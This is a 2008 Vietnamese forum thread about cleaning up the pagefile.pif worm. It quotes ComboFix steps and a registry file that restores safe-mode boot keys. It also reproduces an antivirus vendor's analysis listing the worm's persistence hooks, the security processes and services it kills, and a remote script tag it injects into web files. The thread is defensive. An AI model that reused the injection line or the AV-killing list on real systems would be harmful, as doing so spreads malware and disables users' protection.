[Profile] [PM]

tmd wrote:
Các bước được chắp vá lung tung và không logic tí nào bạn gì đó ơi. Bạn cung cấp cho cái link tiếng Anh tiện cho anh em theo dỏi đi.
Tui thấy ở forum Majogreek như thế này:
http://forums.majorgeeks.com/showthread.php?p=1115940

Your logs in post 16 show that the files I asked you to delete using Combofix didn't delete. It looks from your Combofix log like you didn't make up the txt file and pull it across to the Combofix icon on the desktop. In order for this to work, Combofix must be installed on the desktop, you must make a notepad file as per the instructions which is stored on the desktop and then that notepad file will be dragged across the desktop on top of the comfofix icon. I will repeat the instructions in detail. Please see if it works this time.

Please try and remove these files as follows:

* Make sure that combofix.exe that you downloaded while doing the READ & RUN ME is on your Desktop but Do not run it!
o If it is not on your Desktop, the below will not work.
* Open Notepad and copy/paste the text in the below code box into it:

Code:

Driver::
vsbabfsi

Files::
C:\WINDOWS\system32\drivers\vsbabfsi.sys
C:\uyguxbpt.bat
C:\yhpkihtq.bat

* Save the above as CFscript.txt and make sure you save it to the same location (should be on your Desktop) as ComboFix.exe
* At this point, you MUST EXIT ALL BROWSERS NOW before continuing!
* You should have both the ComboFix.exe and CFScript.txt icons on your Desktop.
* Now use your mouse to drag CFscript.txt on top of ComboFix.exe
* Follow the prompts.
* When it finishes, a log will be produced named c:\combofix.txt
* I will ask for this log below

Note:

Do not mouseclick combofix's window while it is running. That may cause it to stall.

Now run Ccleaner!

Now run the C:\MGtools\GetLogs.bat file by double clicking on it.

Then attach the below logs:

* C:\ComboFix.txt
* C:\MGlogs.zip

Make sure you tell me how things are working now! 


Nó hơi giống giống post tiếng Việt không dấu của bạn.

Còn đầy là ở BeepingComputer.
http://www.bleepingcomputer.com/forums/topic109792.html

I (as well as MicroSoft, McAfee and Symantec) recommend that you DO NOT have more than one anti virus product installed and running on your computer at a time.

The reason for this is that if both products have their automatic (Real-Time) protection switched on, then those products which do not encrypt the virus strings within them can cause other anti virus products to cause "false alarms".

It can also lead to a clash as both products fight for access to files which are opened again this is the resident/automatic protection.

In general terms, the two programs may conflict and cause:

1) False Alarms: When the anti virus software tells you that your PC has a virus when it actually doesn't.
2) System Performance Problems: Your system may lock up due to both products attempting to access the same file at the same time.

Therefore please go to add/remove in the control panel and remove one of these:
.
BitDefeneder Antivirus or AVG antivirus

Do you have Symentec/Norton Antivirus installed also? If so, you need to remove it so that you will be running only one Antivirus program.

************************

Let's look in a different place for signs.

Open HijackThis 2.0.2
Press the button 'View Misc Tools Section'
Press the button 'open uninstall manager'
Press the button 'save list'
A notepad file will open.
Post the content here in your reply.
Close HijackThis.

************************

If you have used Combofix before, please delete the version you are having and redownload it again, because Combofix is being updated everyday.

If your Antivirus or any other realtime scanner is displaying an alert after you downloaded Combofix or while you use Combofix, please disable your scanner and redownload Combofix again. Because some scanners may see some combofix related components as suspicious and block or delete them while there's nothing wrong with them.


1. Download this file - combofix.exe to your Desktop.
Note:
It is important that it is saved directly to your desktop
2. Double click combofix.exe & follow the prompts.
3. When finished, it shall produce a log for you, C:\ComboFix.txt. Post the ComboFix log and a fresh Hijackthis log in your next reply.
Do NOT post the ComboFix-quarantined-files.txt - unless I ask you to.

Note:
Do not mouseclick combofix's window while it's running. That may cause it to stall
If you have Norton Antivirus installed then disable script blocking so it will not interfere with the fix.

To disable Norton Script blocking Service:

* Disable the Script Blocking Service:
To open Services, click Start, point to Settings, and then click Control Panel.
Double-click Administrative Tools, and then double-click Services.
Find ScriptBlocking services, Right-click the service, and then click and then click Properties.
On the General tab, under Startup, click Disabled.
Under Service Status, click Stop button. Click Apply button.

* Disable the Script Blocking In Norton Settings:
Start Norton Antivirus.
Click Options. If a menu appears when you click Options, then click Norton Antivirus. The Norton Antivirus Options dialog box appears.
Click Script Blocking.
Uncheck Enable Script Blocking (recommended).
Click OK
You can reenable it afterwards when everything is clean again.
 

Cũng có thông tin hơi giống giống post tiếng Việt không dấu của bạn.

 

huhuhu, giống hay không giống chưa biết, thấy trước mắt làm theo là màn hình tối hui luôn!
Có ai bồi thường cho tui hem smilie smilie
[Up] [Print Copy]
  [Question]   Re: pagefile.pif, LSASS.EXE, SMSS.EXE 25/03/2008 08:05:35 (+0700) | #145 | 121062
[Avatar]
thephatcompany
Member

[Minus]    0    [Plus]
Joined: 27/02/2008 15:13:47
Messages: 453
Offline
[Profile] [PM] [WWW] [Yahoo!]
Cái này nhiều người nói quá, nên tui pót bài mới là mất tiêu, hay là admin khóa bài của tui vậy ta?
[Up] [Print Copy]
  [Question]   Re: pagefile.pif, LSASS.EXE, SMSS.EXE 27/03/2008 03:33:11 (+0700) | #146 | 121363
hatblack
Member

[Minus]    0    [Plus]
Joined: 26/03/2008 14:49:53
Messages: 1
Offline
[Profile] [PM]
Để diệt con virus này, theo mình làm thì cài lấy 1 con máy sạch trên đó cài Kaspersky internet Security, update rùi mang ổ của máy nhiễm cắm vào quét là xong. Nếu excel file nào nhiễm chọn disinfect cho nó gỡ, còn để phòng nó nhiễm sang máy quét thì disable chức năng autorun của các ổ đĩa là ok, nếu chắc ăn update Bkav quét cho nó 1 lượt.
Disable chức năng Autorun vào key sau để sửa [HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\policies\Explorer]
“NoDriveTypeAutorun”="DD"
nếu muốn quét trong safemode (thường con này nó không cho chạy) thì có thể tạo file bootsafemode.reg có nội dung sau:
Windows Registry Editor Version 5.00

[HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\SafeBoot]
"AlternateShell"="cmd.exe"

[HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\SafeBoot\Minimal]

[HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\SafeBoot\Minimal\AppMgmt]
@="Service"

[HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\SafeBoot\Minimal\Base]
@="Driver Group"

[HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\SafeBoot\Minimal\Boot Bus Extender]
@="Driver Group"

[HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\SafeBoot\Minimal\Boot file system]
@="Driver Group"

[HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\SafeBoot\Minimal\CryptSvc]
@="Service"

[HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\SafeBoot\Minimal\DcomLaunch]
@="Service"

[HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\SafeBoot\Minimal\dmadmin]
@="Service"

[HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\SafeBoot\Minimal\dmboot.sys]
@="Driver"

[HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\SafeBoot\Minimal\dmio.sys]
@="Driver"

[HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\SafeBoot\Minimal\dmload.sys]
@="Driver"

[HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\SafeBoot\Minimal\dmserver]
@="Service"

[HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\SafeBoot\Minimal\EventLog]
@="Service"

[HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\SafeBoot\Minimal\File system]
@="Driver Group"

[HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\SafeBoot\Minimal\Filter]
@="Driver Group"

[HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\SafeBoot\Minimal\HelpSvc]
@="Service"

[HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\SafeBoot\Minimal\Netlogon]
@="Service"

[HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\SafeBoot\Minimal\PCI Configuration]
@="Driver Group"

[HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\SafeBoot\Minimal\PlugPlay]
@="Service"

[HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\SafeBoot\Minimal\PNP Filter]
@="Driver Group"

[HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\SafeBoot\Minimal\Primary disk]
@="Driver Group"

[HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\SafeBoot\Minimal\RpcSs]
@="Service"

[HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\SafeBoot\Minimal\SCSI Class]
@="Driver Group"

[HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\SafeBoot\Minimal\sermouse.sys]
@="Driver"

[HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\SafeBoot\Minimal\sr.sys]
@="FSFilter System Recovery"

[HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\SafeBoot\Minimal\SRService]
@="Service"

[HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\SafeBoot\Minimal\System Bus Extender]
@="Driver Group"

[HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\SafeBoot\Minimal\vga.sys]
@="Driver"

[HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\SafeBoot\Minimal\vgasave.sys]
@="Driver"

[HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\SafeBoot\Minimal\WinMgmt]
@="Service"

[HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\SafeBoot\Minimal\{36FC9E60-C465-11CF-8056-444553540000}]
@="Universal Serial Bus controllers"

[HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\SafeBoot\Minimal\{4D36E965-E325-11CE-BFC1-08002BE10318}]
@="CD-ROM Drive"

[HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\SafeBoot\Minimal\{4D36E967-E325-11CE-BFC1-08002BE10318}]
@="DiskDrive"

[HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\SafeBoot\Minimal\{4D36E969-E325-11CE-BFC1-08002BE10318}]
@="Standard floppy disk controller"

[HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\SafeBoot\Minimal\{4D36E96A-E325-11CE-BFC1-08002BE10318}]
@="Hdc"

[HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\SafeBoot\Minimal\{4D36E96B-E325-11CE-BFC1-08002BE10318}]
@="Keyboard"

[HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\SafeBoot\Minimal\{4D36E96F-E325-11CE-BFC1-08002BE10318}]
@="Mouse"

[HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\SafeBoot\Minimal\{4D36E977-E325-11CE-BFC1-08002BE10318}]
@="PCMCIA Adapters"

[HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\SafeBoot\Minimal\{4D36E97B-E325-11CE-BFC1-08002BE10318}]
@="SCSIAdapter"

[HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\SafeBoot\Minimal\{4D36E97D-E325-11CE-BFC1-08002BE10318}]
@="System"

[HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\SafeBoot\Minimal\{4D36E980-E325-11CE-BFC1-08002BE10318}]
@="Floppy disk drive"

[HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\SafeBoot\Minimal\{71A27CDD-812A-11D0-BEC7-08002BE2092F}]
@="Volume"

[HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\SafeBoot\Minimal\{745A17A0-74D3-11D0-B6FE-00A0C90F57DA}]
@="Human Interface Devices"

[HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\SafeBoot\Network]

[HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\SafeBoot\Network\AFD]
@="Service"

[HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\SafeBoot\Network\AppMgmt]
@="Service"

[HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\SafeBoot\Network\Base]
@="Driver Group"

[HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\SafeBoot\Network\Boot Bus Extender]
@="Driver Group"

[HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\SafeBoot\Network\Boot file system]
@="Driver Group"

[HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\SafeBoot\Network\Browser]
@="Service"

[HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\SafeBoot\Network\CryptSvc]
@="Service"

[HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\SafeBoot\Network\DcomLaunch]
@="Service"

[HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\SafeBoot\Network\Dhcp]
@="Service"

[HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\SafeBoot\Network\dmadmin]
@="Service"

[HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\SafeBoot\Network\dmboot.sys]
@="Driver"

[HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\SafeBoot\Network\dmio.sys]
@="Driver"

[HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\SafeBoot\Network\dmload.sys]
@="Driver"

[HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\SafeBoot\Network\dmserver]
@="Service"

[HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\SafeBoot\Network\DnsCache]
@="Service"

[HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\SafeBoot\Network\EventLog]
@="Service"

[HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\SafeBoot\Network\File system]
@="Driver Group"

[HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\SafeBoot\Network\Filter]
@="Driver Group"

[HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\SafeBoot\Network\HelpSvc]
@="Service"

[HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\SafeBoot\Network\ip6fw.sys]
@="Driver"

[HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\SafeBoot\Network\ipnat.sys]
@="Driver"

[HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\SafeBoot\Network\LanmanServer]
@="Service"

[HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\SafeBoot\Network\LanmanWorkstation]
@="Service"

[HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\SafeBoot\Network\LmHosts]
@="Service"

[HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\SafeBoot\Network\Messenger]
@="Service"

[HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\SafeBoot\Network\NDIS]
@="Driver Group"

[HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\SafeBoot\Network\NDIS Wrapper]
@="Driver Group"

[HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\SafeBoot\Network\Ndisuio]
@="Service"

[HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\SafeBoot\Network\NetBIOS]
@="Service"

[HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\SafeBoot\Network\NetBIOSGroup]
@="Driver Group"

[HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\SafeBoot\Network\NetBT]
@="Service"

[HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\SafeBoot\Network\NetDDEGroup]
@="Driver Group"

[HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\SafeBoot\Network\Netlogon]
@="Service"

[HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\SafeBoot\Network\NetMan]
@="Service"

[HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\SafeBoot\Network\Network]
@="Driver Group"

[HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\SafeBoot\Network\NetworkProvider]
@="Driver Group"

[HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\SafeBoot\Network\nm]
@="Service"

[HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\SafeBoot\Network\nm.sys]
@="Driver"

[HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\SafeBoot\Network\NtLmSsp]
@="Service"

[HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\SafeBoot\Network\PCI Configuration]
@="Driver Group"

[HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\SafeBoot\Network\PlugPlay]
@="Service"

[HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\SafeBoot\Network\PNP Filter]
@="Driver Group"

[HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\SafeBoot\Network\PNP_TDI]
@="Driver Group"

[HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\SafeBoot\Network\Primary disk]
@="Driver Group"

[HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\SafeBoot\Network\rdpcdd.sys]
@="Driver"

[HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\SafeBoot\Network\rdpdd.sys]
@="Driver"

[HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\SafeBoot\Network\rdpwd.sys]
@="Driver"

[HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\SafeBoot\Network\rdsessmgr]
@="Service"

[HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\SafeBoot\Network\RpcSs]
@="Service"

[HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\SafeBoot\Network\SCSI Class]
@="Driver Group"

[HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\SafeBoot\Network\sermouse.sys]
@="Driver"

[HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\SafeBoot\Network\SharedAccess]
@="Service"

[HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\SafeBoot\Network\sr.sys]
@="FSFilter System Recovery"

[HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\SafeBoot\Network\SRService]
@="Service"

[HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\SafeBoot\Network\Streams Drivers]
@="Driver Group"

[HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\SafeBoot\Network\System Bus Extender]
@="Driver Group"

[HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\SafeBoot\Network\Tcpip]
@="Service"

[HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\SafeBoot\Network\TDI]
@="Driver Group"

[HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\SafeBoot\Network\tdpipe.sys]
@="Driver"

[HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\SafeBoot\Network\tdtcp.sys]
@="Driver"

[HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\SafeBoot\Network\termservice]
@="Service"

[HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\SafeBoot\Network\vga.sys]
@="Driver"

[HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\SafeBoot\Network\vgasave.sys]
@="Driver"

[HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\SafeBoot\Network\WinMgmt]
@="Service"

[HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\SafeBoot\Network\WZCSVC]
@="Service"

[HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\SafeBoot\Network\{36FC9E60-C465-11CF-8056-444553540000}]
@="Universal Serial Bus controllers"

[HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\SafeBoot\Network\{4D36E965-E325-11CE-BFC1-08002BE10318}]
@="CD-ROM Drive"

[HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\SafeBoot\Network\{4D36E967-E325-11CE-BFC1-08002BE10318}]
@="DiskDrive"

[HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\SafeBoot\Network\{4D36E969-E325-11CE-BFC1-08002BE10318}]
@="Standard floppy disk controller"

[HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\SafeBoot\Network\{4D36E96A-E325-11CE-BFC1-08002BE10318}]
@="Hdc"

[HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\SafeBoot\Network\{4D36E96B-E325-11CE-BFC1-08002BE10318}]
@="Keyboard"

[HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\SafeBoot\Network\{4D36E96F-E325-11CE-BFC1-08002BE10318}]
@="Mouse"

[HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\SafeBoot\Network\{4D36E972-E325-11CE-BFC1-08002BE10318}]
@="Net"

[HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\SafeBoot\Network\{4D36E973-E325-11CE-BFC1-08002BE10318}]
@="NetClient"

[HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\SafeBoot\Network\{4D36E974-E325-11CE-BFC1-08002BE10318}]
@="NetService"

[HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\SafeBoot\Network\{4D36E975-E325-11CE-BFC1-08002BE10318}]
@="NetTrans"

[HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\SafeBoot\Network\{4D36E977-E325-11CE-BFC1-08002BE10318}]
@="PCMCIA Adapters"

[HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\SafeBoot\Network\{4D36E97B-E325-11CE-BFC1-08002BE10318}]
@="SCSIAdapter"

[HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\SafeBoot\Network\{4D36E97D-E325-11CE-BFC1-08002BE10318}]
@="System"

[HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\SafeBoot\Network\{4D36E980-E325-11CE-BFC1-08002BE10318}]
@="Floppy disk drive"

[HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\SafeBoot\Network\{71A27CDD-812A-11D0-BEC7-08002BE2092F}]
@="Volume"

[HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\SafeBoot\Network\{745A17A0-74D3-11D0-B6FE-00A0C90F57DA}]
@="Human Interface Devices"

chạy file này vào safemode OK
còn để sửa lại folder option thì tìm các khóa của nó sửa lại key.
Nếu quét bị xóa mất các file của win thì chỉ còn nước cài lại máy.
[Up] [Print Copy]
  [Question]   Re: pagefile.pif, LSASS.EXE, SMSS.EXE 27/03/2008 04:00:08 (+0700) | #147 | 121372
[Avatar]
bluearrow
Member

[Minus]    0    [Plus]
Joined: 23/03/2008 22:40:53
Messages: 8
Offline
[Profile] [PM]
Éc éc, xin các bạn cho biết những file nó lây nhiễm là gì, vì tình hình chung là các AV không có thằng nào diệt triệt để được con này.
[Up] [Print Copy]
  [Question]   Re: pagefile.pif, LSASS.EXE, SMSS.EXE 28/03/2008 00:57:05 (+0700) | #148 | 121549
[Avatar]
thephatcompany
Member

[Minus]    0    [Plus]
Joined: 27/02/2008 15:13:47
Messages: 453
Offline
[Profile] [PM] [WWW] [Yahoo!]
Dung Kas bản 7 là diệt được. Thân
[Up] [Print Copy]
  [Question]   Re: pagefile.pif, LSASS.EXE, SMSS.EXE 29/03/2008 03:51:08 (+0700) | #149 | 121800
[Avatar]
Ghost Ship
Member

[Minus]    0    [Plus]
Joined: 21/03/2007 12:10:46
Messages: 467
Location: Đáy biển
Offline
[Profile] [PM]
Vừa gặp lại con này ở máy thằng bạn. Phiên bản mới của nó gớm thật. Procexp cũng kô dùng với nó được nữa. Có vẻ thằng viết con này rất chăm chỉ đi update cái tác phẩm này của nó smilie.

Pó tay với nó trong môi trường Win đành cho đĩa BOOT vào rồi restart, vào DOS để del cái file ~.exe trong Startup của All Users.

Xóa xong cái ~.exe thì restart tiếp. vào đến win thì kô thấy 2 Process kia nữa chứng tỏ nó vẫn chỉ dùng 1 kiểu kích hoạt này thôi. Nếu nó làm phong phú hơn cái công đoạn kích hoạt thì chắc là mình mệt hơn tí smilie

Định cài BKAV ra dọn xác của nó nhưng kô biết nó phá win kiểu gì mà kô cài được. ngay cái lickdup đầu tiên vào cái file BKAV nó đã hiện ra cái bẳng báo lỗi quái j ấy (mệt chả buồn đọc nội dung nó là j smilie) định cài KAV nhưng cũng bị lỗi tương tự. Kô còn hứng thú với nó nên đành GHOST cho nó phát smilie Ghost xong thì cài KAV ra cho nó scan rồi phục hồi những file bị nhiễm trong mấy ổ DATA.

Cách đơn giản (dễ hiểu) nhất để diệt chiệt để con này mà mịt biết là: tháo ổ cứng cắm vào một máy sạch có cài kaspersky đã update con này rồi cho KAV quét hét các ổ của máy bị nhiễm. KAV có thể phục hồi được các file bị nhiễm nên kô sợ bị mất dữ liệu. BKAV hình như cũng làm được nhưng mình chưa thử. máy yếu thì cứ dùng luôn BKAV cho nhẹ nhàng đơn giản.

Khi đã quét xong thì lắp lại ổ về máy cho đĩa win vào cho nó repair lại win để đỡ phải cài lại các chương trình và mất dữ liệu trong ổ C. Còn nếu kô có j quan trọng thì Ghost cho nhanh. smilie

bluearrow wrote:
Éc éc, xin các bạn cho biết những file nó lây nhiễm là gì, vì tình hình chung là các AV không có thằng nào diệt triệt để được con này. 
Mình vừa vào trang của BKAV gõ vào chữ pagefile.pif thì tìm được khá nhiều thông tin về con này.
http://www.bkav.com.vn/thong_tin_virus/17/03/2008/3/1475/
Mô tả kỹ thuật:

* Xóa các key :
HKLM\SYSTEM\CurrentControlSet\Control\SafeBoot\Minimal\{4D36E967-E325-11CE-BFC1-08002BE10318}
HKLM\SYSTEM\CurrentControlSet\Control\SafeBoot\Network\{4D36E967-E325-11CE-BFC1-08002BE10318}
HKLM\Software\Microsoft\Windows\CurrentVersion\Run
* Ghi giá trị :
"AppInit_DLLs" = "C:\\WINDOWS\\system32\\dnsq.dll"
Vào key : HKLM\Software\Microsoft\Windows NT\CurrentVersion\Windows để dll của virus được nạp lên mỗi khi windows khởi động
* Copy bản thân thành file có tên "lsass.exe" vào thư mục %SysDir%\Com, và ~.exe vào thư mục Startup
* Tạo Mutex : CNJBlaipbofF để chỉ 1 file virus chạy trên 1 máy.
* Dump ra các file :
%SysDir%\Com\smss.exe
%SysDir%\Com\netcfg.dll
%SysDir%\Com\netcfg.000
%SysDir%\dnsq.dll
* Sửa key làm mất checkbox để hiển thị các file hệ thống.
* Copy bản thân thành file có tên : "pagefile.pif" kèm theo file autorun.inf vào tất cả các ổ đĩa.
* Tắt các process có chứa một trong các xâu sau : rav, avp, twister, kv, watch, kissvc, scan, guard
* Tắt các service : EQService, HookSys, McShield, tmmbd, PAVSRV, SymEvent, ekrn, KAVBase, klif, AntiVirService, MPSVCService
* Tắt các cửa sổ có chứa 1 trong các xâu : ewido, bitdefender, facelesswndproc, mcafee, metapad, dr.web, avg, arp, 360safe, 360anti, ida, ...
* Thêm vào cuối các file có đuôi: jsp, php, spx, asp, tml, htm tìm thấy trên máy trừ ổ đĩa hệ thống (kể cả trong các file nén .rar) đoạn script :
<script src="http://js.k01[removed].com/01.asp"></script>
* Lây nhiễm vào các file thực thi tìm được trong máy. 


Kô phải AV kô diệt được triệt để con này mà là người diệt kô biết cách diệt triệt để thôi. Chính sự thiếu những kiến thức cơ bản trong việc phòng chống virus của người dùng máy là nguyên nhân chính làm con này và nhiều con tương tự quay lại và làm họ tưởng các AV kô diệt được smilie. NẢN !!!
[Up] [Print Copy]
  [Question]   Re: pagefile.pif, LSASS.EXE, SMSS.EXE 31/03/2008 22:14:49 (+0700) | #150 | 122274
[Avatar]
bluearrow
Member

[Minus]    0    [Plus]
Joined: 23/03/2008 22:40:53
Messages: 8
Offline
[Profile] [PM]

Ghost Ship wrote:


Kô phải AV kô diệt được triệt để con này mà là người diệt kô biết cách diệt triệt để thôi. Chính sự thiếu những kiến thức cơ bản trong việc phòng chống virus của người dùng máy là nguyên nhân chính làm con này và nhiều con tương tự quay lại và làm họ tưởng các AV kô diệt được smilie. NẢN !!! 


Không phải là không biết GS à,
Con này lây vào hai loại file là htm và exe. Bkav xóa được những file htm bị lây nhiễm, nhưng page.pif và các file ~*.exe, lsass.exe, smss.exe và nhữnng file exe bị lây nhiễm lại không phát hiện được.
Còn KAS thì không diệt được những file htm bị lây nhiễm.
Thế chẳng phải không diệt được triệt để là gì?
Chính vì việc không diệt được những file tiềm tàng đó nên máy mới bị "tái nhiễm".
Lúc trước dùng đến 4 thằng quét cùng lúc Bit, Nor, Bkav, Zone, sau đó chưa chắc ăn chui vô dos xóa thủ công luôn thằng page.pif, lsass.exe và smss.exe. Xin hỏi có ai biết tại sao tụi nó không diệt luôn mấy thằng này không? nếu không phân tích kỹ thì tui đâu có biết mà chui vô diệt thủ công mấy file đó sau khi quét xong!?! sở dĩ máy bị tái nhiễm vì tui không ngờ nó nhiễm vào cả những file exe trong máy.
Bạn bảo tui thiếu kiến thức căn bản thì quả là khinh người quá đáng.
[Up] [Print Copy]
[digg] [delicious] [google] [yahoo] [technorati] [reddit] [stumbleupon]
Go to: 
 Users currently in here 
1 Anonymous

Powered by JForum - Extended by HVAOnline
 hvaonline.net  |  hvaforum.net  |  hvazone.net  |  hvanews.net  |  vnhacker.org
1999 - 2013 © v2012|0504|218|